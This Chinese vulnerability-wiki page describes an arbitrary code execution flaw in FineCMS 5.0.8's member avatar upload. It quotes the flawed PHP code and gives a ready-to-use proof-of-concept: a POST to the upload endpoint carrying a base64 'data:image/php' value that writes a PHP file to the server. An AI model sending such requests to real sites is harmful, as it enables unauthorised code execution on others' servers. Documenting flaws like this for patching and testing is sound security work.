menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right yougar0.github.io(基于零组公开漏洞库 + PeiQi文库的一些漏洞)-20210715 chevron_right Web安全 chevron_right Finecms chevron_right Finecms 5.0.8 会员中心任意代码执行漏洞.md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    Finecms 5.0.8 会员中心任意代码执行漏洞.md
    888 B / 2021-04-21 09:23:46
        Finecms 5.0.8 会员中心任意代码执行漏洞
======================================

一、漏洞简介
------------

二、漏洞影响
------------

Finecms 5.0.8

三、复现过程
------------

### 漏洞分析

在文件`./controllersmemberAccount.php`中的upload函数

    if (preg_match('/^(data:\s*image\/(\w+);base64,)/', $file, $result)){
                    $new_file = $dir.'0x0.'.$result[2];
                    if (!@file_put_contents($new_file, base64_decode(str_replace($result[1], '', $file)))) {
                        exit(dr_json(0, '目录权限不足或磁盘已满'));
                    

### 漏洞复现

注册会员,登录访问:

    http://www.0-sec.org:88/index.php?s=member&c=account&m=upload

    POST:tx=data:image/php;base64,PD9waHAgcGhwaW5mbygpOz8+

2.png

3.png

参考链接
--------

> http://4o4notfound.org/index.php/archives/40/
    links
    file_download